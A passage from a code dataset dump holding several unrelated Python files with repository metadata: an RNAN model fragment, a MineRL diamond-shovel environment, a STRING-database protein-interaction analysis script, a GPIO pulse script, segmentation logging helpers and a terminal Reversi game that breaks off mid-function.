self.body_nl_low(feats_shallow)\n for b in self.body:\n res = b(res)\n res = self.body_tail(res)\n res = self.body_nl_high(res)\n res_main = self.tail(res)\n return res_main, res\n", "repo_name": "hamedhaghighi/UTLC", "sub_path": "RNAN/code/model/rnan.py", "file_name": "rnan.py", "file_ext": "py", "file_size_in_byte": 2575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "model.common.ResAttModuleDownUpPlus", "line_number": 12, "usage_type": "call"}, {"api_name": "model.common.conv", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "model.common.conv", "line_number": 29, "usage_type": "call"}, {"api_name": "model.common.conv", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "model.common.conv", "line_number": 34, "usage_type": "call"}, {"api_name": "model.common.conv", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn.functional.fold", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "8083997363", "text": "import gym\n\nfrom minerl.env import _fake, _singleagent\nfrom minerl.herobraine.env_specs.human_survival_specs import HumanSurvival\nfrom minerl.herobraine.hero.handlers.translation import TranslationHandler\nfrom minerl.herobraine.hero.handler import Handler\nfrom minerl.herobraine.hero import handlers\nfrom minerl.herobraine.hero.mc import ALL_ITEMS\nfrom typing import List\n\nTIMEOUT = 18000\nDIAMOND_ITEMS = [\n [[\"acacia_log\", \"birch_log\", \"dark_oak_log\", \"jungle_log\", \"oak_log\", \"spruce_log\"], 1],\n [[\"acacia_planks\", \"birch_planks\", \"dark_oak_planks\", \"jungle_planks\", \"oak_planks\", \"spruce_planks\"], 2],\n [[\"stick\"], 4],\n [[\"crafting_table\"], 4],\n [[\"wooden_pickaxe\"], 8],\n [[\"cobblestone\"], 16],\n [[\"furnace\"], 32],\n [[\"stone_pickaxe\"], 32],\n [[\"iron_ore\"], 64],\n [[\"iron_ingot\"], 128],\n [[\"iron_pickaxe\"], 256],\n [[\"diamond\"], 1024],\n [[\"diamond_shovel\"], 2048]\n]\n\n\nclass ObtainDiamondShovelWrapper(gym.Wrapper):\n def __init__(self, env):\n super().__init__(env)\n self.rewarded_items = DIAMOND_ITEMS\n self.seen = [0] * len(self.rewarded_items)\n self.timeout = self.env.task.max_episode_steps\n self.num_steps = 0\n self.episode_over = False\n\n def step(self, action: dict):\n if self.episode_over:\n raise RuntimeError(\"Expected `reset` after episode terminated, not `step`.\")\n observation, reward, done, info = super().step(action)\n for i, [item_list, rew] in enumerate(self.rewarded_items):\n if not self.seen[i]:\n for item in item_list:\n if observation[\"inventory\"][item] > 0:\n if i == len(self.rewarded_items) - 1: # achieved last item in rewarded item list\n done = True\n reward += rew\n self.seen[i] = 1\n break\n self.num_steps += 1\n if self.num_steps >= self.timeout:\n done = True\n self.episode_over = done\n return observation, reward, done, info\n\n def reset(self):\n self.seen = [0] * len(self.rewarded_items)\n self.episode_over = False\n obs = super().reset()\n return obs\n\n\ndef _obtain_diamond_shovel_gym_entrypoint(env_spec, fake=False):\n \"\"\"Used as entrypoint for `gym.make`.\"\"\"\n if fake:\n env = _fake._FakeSingleAgentEnv(env_spec=env_spec)\n else:\n env = _singleagent._SingleAgentEnv(env_spec=env_spec)\n\n env = ObtainDiamondShovelWrapper(env)\n return env\n\nOBTAIN_DIAMOND_SHOVEL_ENTRY_POINT = \"minerl.herobraine.env_specs.obtain_specs:_obtain_diamond_shovel_gym_entrypoint\"\n\nclass ObtainDiamondShovelEnvSpec(HumanSurvival):\n r\"\"\"\nIn this environment the agent is required to obtain a diamond shovel.\nThe agent begins in a random starting location on a random survival map\nwithout any items, matching the normal starting conditions for human players in Minecraft.\n\nDuring an episode the agent is rewarded according to the requisite item\nhierarchy needed to obtain a diamond shovel. The rewards for each item are\ngiven here::\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n\"\"\"\n def __init__(self):\n super().__init__(\n name=\"MineRLObtainDiamondShovel-v0\",\n max_episode_steps=TIMEOUT,\n # Hardcoded variables to match the pretrained models\n fov_range=[70, 70],\n resolution=[640, 360],\n gamma_range=[2, 2],\n guiscale_range=[1, 1],\n cursor_size_range=[16.0, 16.0]\n )\n\n def _entry_point(self, fake: bool) -> str:\n return OBTAIN_DIAMOND_SHOVEL_ENTRY_POINT\n\n def create_observables(self) -> List[Handler]:\n return [\n handlers.POVObservation(self.resolution),\n handlers.FlatInventoryObservation(ALL_ITEMS)\n ]\n\n def create_monitors(self) -> List[TranslationHandler]:\n return []\n\n\n", "repo_name": "minerllabs/minerl", "sub_path": "minerl/herobraine/env_specs/obtain_specs.py", "file_name": "obtain_specs.py", "file_ext": "py", "file_size_in_byte": 4427, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 587, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gym.Wrapper", "line_number": 29, "usage_type": "attribute"}, {"api_name": "minerl.env._fake._FakeSingleAgentEnv", "line_number": 67, "usage_type": "call"}, {"api_name": "minerl.env._fake", "line_number": 67, "usage_type": "name"}, {"api_name": "minerl.env._singleagent._SingleAgentEnv", "line_number": 69, "usage_type": "call"}, {"api_name": "minerl.env._singleagent", "line_number": 69, "usage_type": "name"}, {"api_name": "minerl.herobraine.env_specs.human_survival_specs.HumanSurvival", "line_number": 76, "usage_type": "name"}, {"api_name": "minerl.herobraine.hero.handlers.POVObservation", "line_number": 117, "usage_type": "call"}, {"api_name": "minerl.herobraine.hero.handlers", "line_number": 117, "usage_type": "name"}, {"api_name": "minerl.herobraine.hero.handlers.FlatInventoryObservation", "line_number": 118, "usage_type": "call"}, {"api_name": "minerl.herobraine.hero.mc.ALL_ITEMS", "line_number": 118, "usage_type": "argument"}, {"api_name": "minerl.herobraine.hero.handlers", "line_number": 118, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 115, "usage_type": "name"}, {"api_name": "minerl.herobraine.hero.handler.Handler", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 121, "usage_type": "name"}, {"api_name": "minerl.herobraine.hero.handlers.translation.TranslationHandler", "line_number": 121, "usage_type": "name"}]} +{"seq_id": "11425012244", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport gzip\nimport time\nimport warnings\nfrom collections import Counter, defaultdict\nfrom random import shuffle\n\nimport pandas\nimport pandas as pd\nimport seaborn as sns\nfrom scipy.stats import mannwhitneyu, kruskal, wilcoxon, ttest_1samp\n\nwarnings.filterwarnings('ignore')\n\nimport sys\nimport os\nfrom os.path import join\n\nimport numpy as np\nimport configparser\n\n###############################################################\n\nconfig_file = os.path.join(os.path.expanduser('~'),'paths.cfg')\ncfg = configparser.ConfigParser()\ncfg.read(config_file)\n\ncode_path = cfg.get('enhancers', 'code_path')\nsys.path.append(code_path)\n###############################################################\n\nfrom pybedtools import BedTool\nimport matplotlib.pyplot as plt\n\nPROJECT_DIR = \"ROOT_DIR/\"\nPLOTS_DIR = \"ROOT_DIR/plots/HOTs/\"\n\nfrom overbinders.data_prep.basic import load_metadata\nimport requests\nimport json\n\ncl_list = [\n\t[\"ZNF687\", \"ARID4B\", \"MAX\", \"SAP130\"],\n\t[\"KMT2A\", \"E2F4\", \"NONO\", \"HNRNPLL\", \"RBM39\", \"POLR2A\", \"POLR2AphosphoS5\", \"RBFOX2\", \"ARID4A\", \"TAF1\", \"ZFY\",\n\t \"GABPB1\", \"PHF8\", \"POLR2G\", \"NR2C2\", \"DRAP1\", \"YEATS4\", \"HMGXB4\", \"KMT2B\", \"TFDP2\", \"MAZ\", \"SPEN\", \"ASH2L\",\n\t \"KDM2A\", \"MNX1\", \"UBTF\", \"GATAD1\", \"ZNF501\", \"DMAP1\"],\n\t[\"NR2F6\", \"TEAD1\", \"SOX5\", \"NFIL3\", \"HNF4A\", \"FOXA2\", \"PPARG\", \"MIXL1\", \"FOXA1\", \"CEBPG\", \"FOXO1\", \"ZNF217\",\n\t \"CEBPA\", \"KDM1A\", \"FOXP1\", \"RCOR2\"],\n\t[\"ZGPAT\", \"MED1\", \"TFAP4\", \"ZFX\", \"EGR1\", \"LIN54\", \"ZNF574\", \"HDAC1\", \"TBX2\", \"THAP11\", \"KAT8\", \"HOXA3\"],\n\t[\"KLF16\", \"PATZ1\", \"ERF\", \"ZNF331\", \"LCORL\", \"IRF2\", \"SKI\", \"ISL2\", \"ZBTB7B\", \"POGZ\", \"IKZF5\", \"HNF1B\", \"FOSL2\",\n\t \"TCF7L2\", \"RXRB\", \"RARA\", \"LCOR\", \"FOXP4\", \"BCL6\", \"GATAD2A\", \"SOX6\", \"PAXIP1\", \"ELF3\", \"SMAD4\", \"HDAC2\", \"FOXA3\"]\n]\n\nstring_api_url = \"https://string-db.org/api\"\noutput_format = \"tsv\"\nmethod = \"ppi_enrichment\"\n\nall_tfs = list(load_metadata()[\"HepG2\"].keys())\n\nfrom pathlib import Path\n\n\ndef get_enrichment(cl_no=1):\n\n\tsave_dir = Path(os.path.join(PLOTS_DIR, f\"PPI_enrichments/{cl_no}\"))\n\tsave_dir.mkdir(exist_ok=True)\n\n\tparams = {\n\t\t\"identifiers\": \"%0d\".join([_ for _ in cl_list[cl_no - 1]]),\n\t\t\"species\": 9606, # species NCBI identifier\n\t\t\"caller_identity\": \"hudaiber@nih.gov\"\n\t}\n\n\trequest_url = \"/\".join([string_api_url, output_format, method])\n\n\tresponse = requests.post(request_url, data=params)\n\n\tsave_file = save_dir/\"main_PPI.txt\"\n\tprint(save_file)\n\twith open(save_file, \"w\") as of:\n\t\tof.write(response.text)\n\n\tfor i in range(100):\n\n\t\tshuffle(all_tfs)\n\n\t\trand_tfs = all_tfs[:len(cl_list[cl_no-1])]\n\n\t\tparams[\"identifiers\"] = \"%0d\".join(rand_tfs)\n\t\trequest_url = \"/\".join([string_api_url, output_format, method])\n\t\tresponse = requests.post(request_url, data=params)\n\n\t\tsave_file = save_dir/f\"rand_{i+1}_PPI.txt\"\n\t\tprint(save_file)\n\t\twith open(save_file, \"w\") as of:\n\t\t\tof.write(response.text)\n\n\t\ttime.sleep(2)\n\n\ndef get_enrichment_stats():\n\n\tsrc_dir = Path(os.path.join(PLOTS_DIR, \"PPI_enrichments/\"))\n\n\tfor i in range(1, 5):\n\n\t\tmain_pvalue = float(open(src_dir/f\"{i}/main_PPI.txt\").readlines()[1].split()[-1])\n\t\trand_pvalues = [float(open(f).readlines()[-1].split()[-1]) for f in (src_dir/f\"{i}\").glob(\"rand_*_PPI.txt\")]\n\n\t\tprint(i, main_pvalue, ttest_1samp(rand_pvalues, main_pvalue))\n\n\t\t# print(main_pvalue, rand_pvalues)\n\n\n", "repo_name": "okurman/HOT", "sub_path": "HOTs/PPI_clusters_analysis.py", "file_name": "PPI_clusters_analysis.py", "file_ext": "py", "file_size_in_byte": 3277, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 25, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "overbinders.data_prep.basic.load_metadata", "line_number": 59, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 77, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 92, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 99, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "scipy.stats.ttest_1samp", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "22320741573", "text": "from gpiozero import LED\nfrom time import sleep\n\n'''\nPulse A : GPIO 13\nPulse B : GPIO 26\n'''\n\npulseA = LED(13)\npulseB = LED(26)\npulseA.on()\npulseB.on()\nsleep(0.05)\npulseA.off()\npulseB.off()\n\n#while True:\n #led.on()\n #sleep(0.05)\n #led.off()\n #sleep(0.05)\n", "repo_name": "jwalkerdev/pi-scratch-projects", "sub_path": "py-gpio-001/pulse-74HC123-gpio16.py", "file_name": "pulse-74HC123-gpio16.py", "file_ext": "py", "file_size_in_byte": 267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gpiozero.LED", "line_number": 9, "usage_type": "call"}, {"api_name": "gpiozero.LED", "line_number": 10, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "4353637260", "text": "\"\"\"\nModule with logging utilities\n\"\"\"\n\nimport logging\nimport typing\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport vlogging\n\nimport net.data\nimport net.processing\n\n\ndef log_predictions(\n logger: logging.Logger, prediction_model: tf.keras.Model,\n images: typing.List[np.ndarray], ground_truth_segmentations: typing.List[np.ndarray],\n categories: typing.List[str], target_size: int):\n \"\"\"\n Log a batch of predictions, along with input images and ground truth segmentations\n\n Args:\n logger (logging.Logger): logger instance\n prediction_model (tf.keras.Model): prediction model\n images (typing.List[np.ndarray]): list of images to run predictions on\n ground_truth_segmentations (typing.List[np.ndarray]): list of ground truth segmentations\n categories (typing.List[str]): list of segmentation categories\n target_size (int): common size to which all images should be padded for prediction\n \"\"\"\n\n padded_images = np.array([net.processing.pad_to_size(\n image=image,\n size=target_size,\n color=(0, 0, 0)\n ) for image in images])\n\n logger.info(\n vlogging.VisualRecord(\n title=\"images\",\n imgs=[cv2.pyrDown(image) for image in images]\n )\n )\n\n ground_truth_overlays = [\n net.processing.get_segmentation_overlay(\n image=image,\n segmentation=segmentation,\n background_color=(0, 0, 0,)\n ) for image, segmentation in zip(images, ground_truth_segmentations)]\n\n logger.info(\n vlogging.VisualRecord(\n title=\"ground truth segmentations\",\n imgs=[cv2.pyrDown(image) for image in ground_truth_overlays]\n )\n )\n\n indices_to_colors_map = net.data.get_colors_info(categories_count=len(categories))[0]\n\n bgr_predictions = [net.processing.get_dense_segmentation_labels_image(\n segmentation_image=np.argmax(prediction, axis=-1),\n indices_to_colors_map=indices_to_colors_map)\n for prediction in prediction_model.predict(padded_images)]\n\n borderless_bgr_predictions = [net.processing.remove_borders(\n image=prediction,\n target_size=ground_truth_image.shape[:2]\n ) for prediction, ground_truth_image in zip(bgr_predictions, images)]\n\n predictions_overlays = [\n net.processing.get_segmentation_overlay(\n image=image,\n segmentation=segmentation,\n background_color=(0, 0, 0,)\n ) for image, segmentation in zip(images, borderless_bgr_predictions)]\n\n logger.info(\n vlogging.VisualRecord(\n title=\"predictions overlays\",\n imgs=[cv2.pyrDown(image) for image in predictions_overlays]\n )\n )\n", "repo_name": "PuchatekwSzortach/voc_encoder_decoder_with_atrous_separable_convolutions", "sub_path": "net/logging.py", "file_name": "logging.py", "file_ext": "py", "file_size_in_byte": 2737, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.Logger", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 19, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "net.data.processing.pad_to_size", "line_number": 33, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 33, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 33, "usage_type": "name"}, {"api_name": "vlogging.VisualRecord", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.pyrDown", "line_number": 42, "usage_type": "call"}, {"api_name": "net.data.processing.get_segmentation_overlay", "line_number": 47, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 47, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 47, "usage_type": "name"}, {"api_name": "vlogging.VisualRecord", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.pyrDown", "line_number": 56, "usage_type": "call"}, {"api_name": "net.data.data.get_colors_info", "line_number": 60, "usage_type": "call"}, {"api_name": "net.data.data", "line_number": 60, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 60, "usage_type": "name"}, {"api_name": "net.data.processing.get_dense_segmentation_labels_image", "line_number": 62, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 62, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 63, "usage_type": "call"}, {"api_name": "net.data.processing.remove_borders", "line_number": 67, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 67, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 67, "usage_type": "name"}, {"api_name": "net.data.processing.get_segmentation_overlay", "line_number": 73, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 73, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 73, "usage_type": "name"}, {"api_name": "vlogging.VisualRecord", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.pyrDown", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "24860047862", "text": "from termcolor import colored\nimport numpy as np\nimport random\nimport sys\n\n# view\nboard_row_header = ' a b c d e f g h'\nboard_row_top = '---+---+---+---+---+---+---+---'\nwhite_piece = colored('●', 'white')\nwhite_legal_move = colored('●', 'white', attrs=['blink'])\nblack_piece = colored('●', 'blue')\nblack_legal_move = colored('●', 'blue', attrs=['blink'])\nboard_piece = {0: ' |', 1: ' ' + white_piece + ' |', 2: ' ' + black_piece + ' |'}\n\n# board model - will be an (8, 8) numpy array\nboard = []\n\n# player color global (never changed after opening selection of game)\nhuman_player = 1\ncomputer_player = 2\n\n# move entry validation and input-to-model transformation dicts\nvalid_grid_letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\nvalid_grid_numbers = ['1', '2', '3', '4', '5', '6', '7', '8']\nvalid_show_moves = ['show moves', 'show move', 'show', 'moves', 'showmoves', 'showmove']\nletter_to_int = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7}\n\n# PRINT FUNCTIONS\ndef print_title():\n\tprint(colored('\\n\\n ___ ___ ___ ___ ___ ' +\n\t\t' \\n / /\\ / /\\ ___ / /\\ / /\\ / /\\ ___ ' +\n\t\t' \\n / /::\\ / /:/_ /__/\\ / /:/_ / /::\\ / /:/_ / /\\ ' +\n\t\t' \\n / /:/\\:\\ / /:/ /\\ \\ \\:\\ / /:/ /\\ / /:/\\:\\ / /:/ /\\ / /:/ ' +\n\t\t' \\n / /:/~/:/ / /:/ /:/_ \\ \\:\\ / /:/ /:/_ / /:/~/:/ / /:/ /::\\/__/::\\ ' +\n\t\t' \\n /__/:/ /:/__/__/:/ /:/ /\\___ \\__\\:/__/:/ /:/ //__/:/ /:/__/__/:/ /:/\\:\\__\\/\\:\\__ ' +\n\t\t' \\n \\ \\:\\/:::::\\ \\:\\/:/ /:/__/\\ | |:\\ \\:\\/:/ /:\\ \\:\\/:::::\\ \\:\\/:/~/:/ \\ \\:\\/\\\\ ' +\n\t\t' \\n \\ \\::/~~~~ \\ \\::/ /:/\\ \\:\\| |:|\\ \\::/ /:/ \\ \\::/~~~~ \\ \\::/ /:/ \\__\\::/ ' +\n\t\t' \\n \\ \\:\\ \\ \\:\\/:/ \\ \\:\\__|:| \\ \\:\\/:/ \\ \\:\\ \\__\\/ /:/ /__/:/ ' +\n\t\t' \\n \\ \\:\\ \\ \\::/ \\__\\::::/ \\ \\::/ \\ \\:\\ /__/:/ \\__\\/ ' +\n\t\t' \\n \\__\\/ \\__\\/ ~~~~ \\__\\/ \\__\\/ \\__\\/ \\n \\n' +\n\t\t' by allenhj \\n \\n Welcome to the game \\n', 'green'))\n\n# board that shows only existing moves\ndef print_board(board):\n\n\t# np.where returns 2 same-length numpy arrays of row, col indices\n\tscore_white = len(np.where(board == 1)[0])\n\tscore_black = len(np.where(board == 2)[0])\n\n\tprint(colored(board_row_header, 'green'))\n\tprint(' ' + colored('/' + board_row_top + '\\\\', 'blue'))\n\tfor i in range(0, 8):\n\t\trow = colored(str(i+1), 'green') + colored(' |', 'blue')\n\t\t#row = colored(str(i), 'green') + colored(' |', 'blue')\n\t\tfor j in range(0, 8):\n\t\t\trow += board_piece[int(board[i][j])]\n\t\trow = row[:-1] + colored('|', 'blue')\n\t\tif i == 2:\n\t\t\trow += colored('\tScore | ', 'green') + 'White: ' + str(score_white)\n\t\tif i == 3:\n\t\t\trow += colored('\t | ', 'green') + colored('Black: ' + str(score_black), 'blue')\n\t\tprint(row)\n\t\tif i != 7:\n\t\t\tprint(colored(' +', 'blue') + board_row_top + colored('+', 'blue'))\n\tprint(' ' + colored('\\\\' + board_row_top + '/', 'blue'))\n\n# board showing the current player's legal moves\ndef print_possible_moves_board(board, legal_moves, color):\n\tprint('\\n Your legal moves: \\n')\n\tprint(colored(board_row_header, 'green'))\n\tprint(' ' + colored('/' + board_row_top + '\\\\', 'blue'))\n\t# 0-8 for terminal display, 1-9 for debug\n\tfor i in range(0, 8):\n\t\trow = colored(str(i+1), 'green') + colored(' |', 'blue')\n\t\tfor j in range(0, 8):\n\t\t\tif (i, j) in legal_moves:\n\t\t\t\trow += ' ' + white_legal_move + ' |' if color == 'white' else ' ' + black_legal_move + ' |'\n\t\t\telse:\n\t\t\t\trow += board_piece[int(board[i][j])]\n\t\trow = row[:-1] + colored('|', 'blue')\n\t\tprint(row)\n\t\tif i != 7:\n\t\t\tprint(colored(' +', 'blue') + board_row_top + colored('+', 'blue'))\n\tprint(' ' + colored('\\\\' + board_row_top + '/', 'blue'))\n\n# GAME FUNCTIONS\n\n# prepare a new game board\n# set start positions\n# print initial move\ndef prepare_new_game(board):\n\tglobal human_player\n\tglobal computer_player\n\n\tsys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=18, cols=85))\n\tprint_title()\n\n\t# get player choice\n\tchoice = input('Choose Black or White (Black goes first): ').lower()\n\twhile choice != 'black' and choice != 'white':\n\t\tchoice = input('Invalid entry. Choose Black or White (Black\\n goes first): ').lower()\n\tif choice == 'white':\n\t\thuman_player, computer_player = 1, 2\n\telse:\n\t\thuman_player, computer_player = 2, 1\n\n\t# clear board from previous game\n\tboard = np.zeros(shape=(8,8))\n\n\t# set start positions\n\tboard[3][3] = human_player\n\tboard[3][4] = computer_player\n\tboard[4][3] = computer_player\n\tboard[4][4] = human_player\n\n\tsys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=48, cols=85))\n\n\tprint('\\n The game has begun \\n Starting Postions: \\n')\n\tprint_board(board)\n\n\t# initial turn\n\n\tif choice != 'black':\n\t\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\t\tboard = take_computer_turn(board, (white_legal_moves, black_legal_moves))\n\t\tprint('\\n Computer move: \\n')\n\t\tprint_board(board)\n\n\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\treturn board, white_legal_moves, black_legal_moves\n\n# get user input, validate it is a valid grid value and a legal move\ndef take_human_turn(board, legal_moves):\n\tglobal human_player\n\n\tlegal_moves_shown = False\n\tinvalid_entry = False\n\tvalid_entry_not_legal = False\n\tmove_is_legal = False\n\n\twhile move_is_legal == False:\n\t\t# showing possible moves\n\t\tif legal_moves_shown:\n\t\t\tif valid_entry_not_legal:\n\t\t\t\tmove = input('\\n Illegal move. Enter one of the legal move grid values: ').lower()\n\t\t\t\tvalid_entry_not_legal = False\n\t\t\telif invalid_entry:\n\t\t\t\tmove = input('\\n Invalid entry. Valid entries are in form `a2`, `g6`, (i.e. A-H, 1-8). Enter: ').lower()\n\t\t\t\tinvalid_entry = False\n\t\t\telse:\n\t\t\t\tmove = input('\\n Choose a move by entering one of the legal move grid values: ').lower()\n\n\t\t\tvalid_entry = (len(move) == 2 and move[0] in valid_grid_letters and move[1] in valid_grid_numbers)\n\n\t\t\tif valid_entry == False:\n\t\t\t\tinvalid_entry = True\n\t\t\telse:\n\t\t\t\tgrid_val = move_to_grid_val(move)\n\t\t\t\tif grid_val in (legal_moves[human_player-1]):\n\t\t\t\t\tmove_is_legal = True\n\t\t\t\t\tboard = update_board(board, grid_val, human_player)\n\t\t\t\telse:\n\t\t\t\t\tvalid_entry_not_legal = True\n\t\t# not showing possible moves\n\t\telse:\n\t\t\tif valid_entry_not_legal:\n\t\t\t\tmove = input('\\n Illegal move. Enter one of the legal move grid\\n values or `Show Moves` for a hint: ').lower()\n\t\t\t\tvalid_entry_not_legal = False\n\t\t\telif invalid_entry:\n\t\t\t\tmove = input('\\n Invalid entry. Valid entries are in form `a2`,\\n `g6`, (i.e. A-H, 1-8) or `Show Moves`: ').lower()\n\t\t\t\tinvalid_entry = False\n\t\t\telse:\n\t\t\t\tmove = input('\\n Choose a move by entering grid value, or enter\\n `Show Moves` to see all legal moves: ').lower()\n\n\t\t\tvalid_entry = (len(move) == 2 and move[0] in valid_grid_letters and move[1] in valid_grid_numbers or move in valid_show_moves)\n\n\t\t\tif valid_entry and move in valid_show_moves:\n\t\t\t\tlegal_moves_shown = True\n\t\t\t\tprint_possible_moves_board(board, legal_moves[human_player-1], 'white' if human_player == 1 else 'black')\n\t\t\telif valid_entry == False:\n\t\t\t\tinvalid_entry = True\n\t\t\telse:\n\t\t\t\tgrid_val = move_to_grid_val(move)\n\t\t\t\tif grid_val in (legal_moves[human_player-1]):\n\t\t\t\t\tmove_is_legal = True\n\t\t\t\t\tboard = update_board(board, grid_val, human_player)\n\t\t\t\telse:\n\t\t\t\t\tvalid_entry_not_legal = True\n\n\treturn board\n\n# choose a random move out of legal moves\n# lots of room for expansion into Othello/Reversi AI algos in a v2\ndef take_computer_turn(board, legal_moves):\n\t# legal_moves is a tuple of white and black legal moves\n\tglobal computer_player\n\n\tif len(legal_moves) == 2 :\n\t\tmove = legal_moves[computer_player - 1][random.randint(0, len(legal_moves[computer_player - 1]) -1)]\n\telif len(legal_moves == 1):\n\t\t# special case: no opponent moves list, in shape [(n,n)...] instead of [[(n,n)...], [(n,n)...]]\n\t\tmove = legal_moves[0]\n\tboard = update_board(board, move, computer_player)\n\treturn board\n\n# print out the final score and declare a winner\ndef end_game(board):\n\tsys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=15, cols=69))\n\tprint(colored('\\n\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GAME OVER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'green',))\n\tscore_white = len(np.where(board == 1)[0])\n\tscore_black = len(np.where(board == 2)[0])\n\tline_one = ' ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● '\n\tline_two = ' ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● '\n\tif score_white > score_black:\n\t\tfor i in range(0, 2):\n\t\t\tprint(colored(line_one, 'white', attrs=['blink']))\n\t\t\tprint(colored(line_two, 'white', attrs=['blink']))\n\t\tprint(colored(' ● ● ● ● ● ● ● ', 'white', attrs=['blink']) + \\\n\t\t\t 'White Wins!' + colored(' ● ● ● ● ● ● ● ', 'white', attrs=['blink']))\n\t\tfor i in range(0, 2):\n\t\t\tprint(colored(line_two, 'white', attrs=['blink']))\n\t\t\tprint(colored(line_one, 'white', attrs=['blink']))\n\telif score_black > score_white:\n\t\tfor i in range(0, 2):\n\t\t\tprint(colored(line_one, 'blue', attrs=['blink']))\n\t\t\tprint(colored(line_two, 'blue', attrs=['blink']))\n\t\tprint(colored(' ● ● ● ● ● ● ● ', 'blue', attrs=['blink']) + \\\n\t\t\t colored('Black Wins!', 'blue') + \\\n\t\t\t colored(' ● ● ● ● ● ● ● ', 'blue', attrs=['blink']))\n\t\tfor i in range(0, 2):\n\t\t\tprint(colored(line_two, 'blue', attrs=['blink']))\n\t\t\tprint(colored(line_one, 'blue', attrs=['blink']))\n\telse:\n\t\tline_one = ' '\n\t\tline_two = ' '\n\t\tblue = colored('● ', 'blue', attrs=['blink'])\n\t\twhite = colored('● ', 'white', attrs=['blink'])\n\t\tfor i in range (0, 8):\n\t\t\tline_one += blue + white\n\t\t\tline_two += blue + white\n\t\tline_one += blue\n\t\tfor i in range(0, 